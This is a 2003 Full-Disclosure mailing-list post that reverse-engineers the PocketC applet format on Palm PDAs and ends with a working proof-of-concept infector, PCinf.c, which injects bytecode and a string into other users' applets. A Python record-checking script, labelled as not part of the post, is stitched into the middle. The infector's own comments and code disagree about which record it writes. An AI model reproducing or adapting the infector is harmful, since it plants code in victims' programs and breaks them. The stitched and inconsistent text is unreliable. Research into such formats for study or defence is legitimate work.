[Full-Disclosure] playing pocketc...
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] playing pocketc...
- From: qobaiashi@xxxxxxx
- Date: Fri, 12 Sep 2003 14:21:27 +0200 (MEST)
file attached...
hi there!
the following is about palm pdas+pocketc so if you're not interested stop here
-->.<--
this is dedicated to all who play around on their palm while waiting for the
subway :)
what exactly are you trying to tell us?
========================================
i wanted to write an infector for pocketc applets..and that's what i found out.
what is PocketC?
==================
PocketC provides a way to write and compile C code directly on
a Palm PDA. compilation does not produce independent programs
but a kind of applet which is executed via the PocketC
virtual machine (PCvm). after compilation a database is created
which contains 4 records, named #0 to #3.
#0 - contains code
#1 - additional stuff (honestly i have no idea)
#2 - static strings, function names
#3 - same as #1
a closer look at #0
===================
at first there is some code which holds some information about the applet
(i think). for example the first 2 bytes hold the size of record #0 - 2,
which limits the possible size to 0xffff bytes ;). imho this is not that
important. in any case in my examples the first 28 bytes (mostly followed
by a NULL) are quite similar in all applets. after that come the functions,
followed by function main. on simple applets the last 9 bytes are mostly
the same (or similar). observation: imho all sub functions end with a 0x2c,
which could be smth like the well known int $0x80..dunno.
a closer look at #2
===================
the first 6 bytes are again smth like a header..nothing useful except for
the first 2 bytes which again hold the recordsize-2. at offset 7 the strings
start. right before a string is a byte which contains the strlen of the
string, and each string is followed by a NULL. thus the end of the record is a NULL.
extracted code snips
====================
// exits to app launcher
exit() - "\x28\x70\x2c";
// prints smth from #2
// byte 3 points on the string:
// points on the null byte before a string entry
puts() - "\x03\x00\x??\x07\x28\x01\x2c";
// launches a proggie named in #2
// works as puts() does..
launch() - "\x03\x00\x??\x07\x28\x58\x2c";
// ret
// i'm not sure about that one at least it is the end
// of main in simple applets. other func()'s return similar
// perhaps this one works for them, too
ret - "\x2b\x2f\x29";
// code to reserve a string variable (at least i think so..)
// 0x?? = size
"\x33\x00\x??\x0c\x03\x00\x00\x2b\x2d\x00\x??";
i do not yet know how more complex functions work so...
this is enough information to write a little infector which
injects simple code into a victim applet. oh by the way
this code seems to be pic ;).
all this was done using version 6.0 of pocketc.
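as an added defender-side check (not part of this post and not PocketC code), the following parses record #2 using the layout described above and compares the 2-byte size field against the real record size; an entry appended at the old end of the record without the header being updated shows up as a mismatch. the 6-byte header, the meaning of the first two bytes, the big-endian byte order and the sample records are assumptions/constructed data, not taken from a real applet.

```python
import struct

HEADER_LEN = 6  # "the first 6 bytes are again smth like a header" (assumption from the post)

def parse_record2(rec: bytes):
    """Walk a PocketC record #2 using the layout described in the post.

    Assumed layout: a 2-byte size field holding (record size - 2), read here as
    big-endian (assumption, Palm OS 68k order), 4 more header bytes, then
    entries of [length byte][text][NUL] up to the end of the record.
    Returns (declared_size, [(offset_of_length_byte, text), ...]).
    """
    if len(rec) < HEADER_LEN + 1:
        raise ValueError("record too short for a #2 header")
    declared = struct.unpack(">H", rec[:2])[0]
    entries = []
    off = HEADER_LEN
    while off < len(rec):
        text_end = off + 1 + rec[off]  # position of the terminating NUL
        if text_end >= len(rec):
            raise ValueError(f"entry at offset {off} runs past the record end")
        if rec[text_end] != 0:
            raise ValueError(f"entry at offset {off} is not NUL-terminated")
        entries.append((off, rec[off + 1:text_end].decode("latin-1")))
        off = text_end + 1
    return declared, entries

def check_record2(rec: bytes):
    """Return (findings, entries); an empty findings list means no mismatch."""
    declared, entries = parse_record2(rec)
    findings = []
    if declared != len(rec) - 2:
        findings.append("size field %d != record size - 2 (%d): data appended "
                        "without updating the header" % (declared, len(rec) - 2))
    return findings, entries

def build_record2(strings):
    """Build a well-formed record #2 (constructed sample, not a real applet)."""
    body = b"".join(bytes([len(s)]) + s.encode("latin-1") + b"\x00" for s in strings)
    return struct.pack(">H", HEADER_LEN - 2 + len(body)) + b"\x00" * 4 + body

# Constructed samples: a clean string table, and the same table after an entry
# was appended at the old end of the record with the header left untouched.
CLEAN = build_record2(["hello", "PktC"])
INFECTED = CLEAN + b"\x0ainfected!\n\x00"

if __name__ == "__main__":
    for label, rec in (("clean", CLEAN), ("infected", INFECTED)):
        findings, entries = check_record2(rec)
        print(label, [t for _, t in entries], findings or "ok")
```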
POC:
====
// PCinf.c
/*
this is a simple code infector
for pocketc running on palm
compatible hardware.
it injects a string printing
code.
you can also use the launch()
code and exec eg. "memo"..
unpleasant side effects:
*atm the applet gets "unusable"
for its normal purpose :>
*bigger applets crash due to
this buggy "ret" thingie..
by qobaiashi
*/
#define LOCATION 0x1d
main()
{
string name,
code[11] =
{"\x03\x90\x05\x07\x28\x01\x2c\x2b\x2f\x29\x00"},
msg[12] =
// 1st byte = strlen!
{"\x0ainfected!\n\x00"};
int dbcntr = 0, cntr, record, size,
r2size;
char patch;
pointer ptr;
clear();
puts(" ---PCinf--- \n");
puts(" PocketC \n");
puts(" infector \n");
puts(" by qobaiashi\n\n");
name = gets("Applet to infect:");
if (strlen(name) == 0)
{
puts("[!] i need a victim..\n");
launch("PktC");
}
puts("[*] using applet: "+name+
"\n");
// opening said database
dbopen(name);
//---string infector section---\\
//write a string into #2
// set record number:
record = 0;
dbrec(record);
dbcntr = dbsize();
r2size = dbcntr;// for patching..
puts("using record "+record+"\n");
puts("record size = "+dbcntr+"\n");
// set offset in current record
dbseek(dbcntr);
puts("location is "+dbpos()+"\n\n");
size = strlen(msg);
ptr = msg+size;
dbwritex(ptr, 'c');
ptr = msg;
dbwritex(ptr, 'ssize');
//---code infector section---\\
// set record number
record = 0;
dbcntr = dbsize();
puts("using record "+record+"\n");
puts("record size = "+dbcntr+"\n");
// set offset in current record
dbseek(LOCATION);
puts("location is "+dbpos()+"\n\n");
// write out hostile code
ptr = code;
dbwritex(ptr, 'ssize');
// patch 0x00 into code
ptr = code + size;
dbseek(LOCATION+1);
dbwritex(ptr, 'c');
// patch string offset in #2 into code
dbseek(LOCATION+2);
patch = r2size;
dbwritex(&patch, 'c');
dbclose();
}